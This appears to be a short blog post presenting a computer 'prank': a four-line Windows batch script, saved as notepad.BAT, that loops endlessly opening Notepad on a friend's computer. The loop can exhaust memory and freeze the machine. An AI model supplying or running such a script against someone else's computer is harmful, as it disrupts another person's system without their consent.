Notepad Trick : Open More Notepad Continuously
This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.
Open Notepad continually in your friend's computer:
Enter the code in the Notepad as:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Now Save it as "notepad.BAT" and double click it and enjoy the magic Sharing is sexy
0 comments for this post
Leave a reply